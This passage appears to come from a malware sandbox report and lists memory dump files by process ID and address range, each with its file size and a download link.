Filesize
112KB

Download
memory/4492-121-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5216-664-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-632-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-827-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-826-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-630-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-631-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-620-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-634-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-662-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-665-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-613-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-633-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-635-0x0000000000CA0000-0x0000000000CC0000-memory.dmp

Filesize
128KB

Download
memory/5216-663-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5216-666-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5288-597-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5288-603-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5288-600-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5288-598-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5288-599-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5288-596-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5636-0-0x00007FFBAB173000-0x00007FFBAB175000-memory.dmp

Filesize
8KB

Download
memory/5636-11-0x00007FFBAB170000-0x00007FFBABC32000-memory.dmp

Filesize
10.8MB

Download
memory/5636-6-0x0000025EB4110000-0x0000025EB4132000-memory.dmp

Filesize
136KB

Download
memory/5636-10-0x00007FFBAB170000-0x00007FFBABC32000-memory.dmp

Filesize
10.8MB

Download
memory/5636-16-0x00007FFBAB170000-0x00007FFBABC32000-memory.dmp

Filesize
10.8MB

Download
memory/5636-13-0x00007FFBAB170000-0x00007FFBABC32000-memory.dmp

Filesize
10.8MB

Download
memory/5636-12-0x00007FFBAB170000-0x00007FFBABC32000-memory.dmp

Filesize
10.8MB

Download